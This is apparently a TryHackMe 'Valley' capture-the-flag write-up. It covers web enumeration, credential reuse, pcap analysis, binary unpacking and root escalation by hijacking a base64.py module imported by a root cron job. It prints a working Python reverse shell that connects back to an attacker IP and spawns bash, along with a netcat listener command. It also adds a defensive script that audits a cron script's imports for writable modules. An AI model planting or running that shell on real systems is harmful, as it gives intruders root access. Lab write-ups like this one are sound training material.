Introduction
The room Valley is one of TryHackMe's easy boxes. We need to find the user flag and the root flag to complete the room. The description says: Boot the box and find a way in to escalate all the way to root!
Initial Access
I grew tired of typing IPs in the terminal, so this time I added the room's IP to /etc/hosts as valley.thm. Then I started with an Nmap scan as usual.
We have SSH on port 22 and a website on port 80. I checked the website, but there was nothing interesting to find here.
The buttons led to a gallery and a pricing table. In the site's source and in the inspector's view, there was nothing else to see. I quickly searched for the usual /robots, /robots.txt etc., but no luck here either. I used gobuster to enumerate the website further.
The directory /server-status was the only newcomer on the list, but access was forbidden. I noticed that the pictures from the gallery were stored in /static: the first picture was stored in /static/1, the second in /static/2, and so on. I tried a couple of other combinations like /static/99 and /static/01, and out of pure luck /static/00 gave me a hit.
There I got another directory to try, which I did immediately. It led to a login page.
This time I had no luck trying the usual suspects like admin/admin. So I checked the source of the site again and gave it a closer look in the inspector. There I found a suspicious dev.js file.
In the dev.js file, I found the credentials to log in.
Again I got some notes. The first one gave me the impression that I should try reusing the found credentials; the last one made me do another Nmap scan for all possible ports.
There is one additional port open with an unknown service. I expected it to be the FTP port mentioned in the note. I tried the credentials found in dev.js and had access to the FTP server.
I found three files, and all of them seemed to be packet captures. I downloaded them to my machine and inspected them further with Wireshark. After a couple of minutes, I found some credentials in siemHTTTP2.pcap. I used them to log in via SSH.
Here I found the user flag.
Privilege Escalation
In valleyDev's directory, I found a file called valleyAuthenticator. It seemed to be a compiled program, but I couldn't start it. I checked whether Python was available on valleyDev's machine, and it was. So I opened a Python simple HTTP server and downloaded the file to my machine for further inspection. I tried to decompile it with Ghidra, but wasn't able to get anything useful. I'm by no means an expert in reverse engineering; it's something I need to address in the future. I spent some time trying to reverse-engineer the file, but after a while I gave up and looked at this writeup. The author used a tool called upx. I followed CyberiumX's instructions and was able to get two MD5 hashes. I cracked them with an online hash tool and got credentials for the user valley. I used them to log in via SSH.
Getting Root
In valley's directory, there was nothing of interest to find. I checked for interesting crontabs.
I found a Python program that ran as root. I opened it and immediately noticed the base64 import. This meant I could possibly use a technique called path hijacking: the cron job runs as root and imports base64 from the library path, so if the base64.py module it picks up is writable by a low-privileged user, whatever is placed in that module runs as root.
I located the base64.py file.
I opened it in nano so I could sneak in a reverse shell. I put the following reverse shell into the b64encode() function of the base64.py file.
import sys
import socket
import os
import pty
# Connect back to the attacking machine's listener (my VPN IP, port 1234).
s=socket.socket()
s.connect(("10.8.31.69", 1234))
# Point stdin, stdout and stderr at the socket so the shell talks over it.
[os.dup2(s.fileno(), fd) for fd in (0,1,2)]
# Spawn an interactive bash with a pty; since cron runs the script as root, so is this shell.
pty.spawn("/bin/bash")
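The root cause here is a root cron job importing a module that a normal user can edit. As an added example (not code from the original writeup or from the room), the script below resolves a Python script's imports the same way the interpreter does and reports any imported file that is not owned by root or is group-/world-writable, which is the check an administrator would run to catch this before a cron job is deployed. It uses only the standard library; the cron script source and the planted base64.py in the demo are constructed for illustration.

```python
"""Audit a Python script's imports for files a non-root user could modify.
Added example for this writeup, not code from the original post or the room.
Standard library only; the cron script and the planted module are constructed."""
import ast
import importlib.machinery
import os
import stat
import sys
import tempfile

# Constructed stand-in for a root cron job that imports base64.
SAMPLE_CRON_SCRIPT = """import base64
import os
data = base64.b64encode(b"gallery backup")
"""


def imported_modules(source):
    """Top-level module names a script imports, sorted (both import forms)."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                names.add(alias.name.split(".")[0])
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def weak_permissions(path):
    """Reasons a file (or its directory) could be altered by someone other than root."""
    st = os.stat(path)
    problems = []
    if st.st_uid != 0:
        problems.append("owned by uid %d, not root" % st.st_uid)
    if st.st_mode & stat.S_IWGRP:
        problems.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        problems.append("world-writable")
    parent_mode = os.stat(os.path.dirname(path)).st_mode
    if parent_mode & stat.S_IWOTH and not parent_mode & stat.S_ISVTX:
        problems.append("parent directory world-writable")
    return problems


def audit_script(source, search_path=None):
    """Resolve each import the way the interpreter would (first hit on the
    search path wins) and return {module: (file, problems)}; modules that are
    built in or not found on the path map to None."""
    path = list(sys.path) if search_path is None else list(search_path)
    report = {}
    for name in imported_modules(source):
        # PathFinder is used directly so a cached sys.modules entry cannot
        # hide which file the search path would actually hand to the cron job.
        spec = importlib.machinery.PathFinder.find_spec(name, path)
        if spec is None or not spec.has_location or spec.origin is None:
            report[name] = None
            continue
        report[name] = (spec.origin, weak_permissions(spec.origin))
    return report


def plant_and_audit():
    """Constructed demo: a world-writable base64.py placed ahead of the stdlib
    on the search path, the situation the cron job in the room was exposed to."""
    tmp = tempfile.mkdtemp()
    fake = os.path.join(tmp, "base64.py")
    with open(fake, "w") as fh:
        fh.write("# stand-in for a module a low-privileged user could edit\n")
    os.chmod(fake, 0o666)
    return audit_script(SAMPLE_CRON_SCRIPT, [tmp] + sys.path)


if __name__ == "__main__":
    for module, result in plant_and_audit().items():
        if result is None:
            print("%-8s built-in / not on search path" % module)
        else:
            origin, problems = result
            print("%-8s %s  %s" % (module, origin, ", ".join(problems) or "ok"))
```

Run it against the real cron script with `audit_script(open(path).read())` and the interpreter's own `sys.path`; the fix for anything it flags is to make the module and its directory root-owned and not writable by group or others (or to point the cron job at an interpreter whose library path is locked down).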
While I waited for the cron job to run, I set up a Netcat listener on port 1234.
nc -lvnp 1234
After the cron job ran, I got a reverse shell as root and was able to retrieve the root flag.
And the room was completed.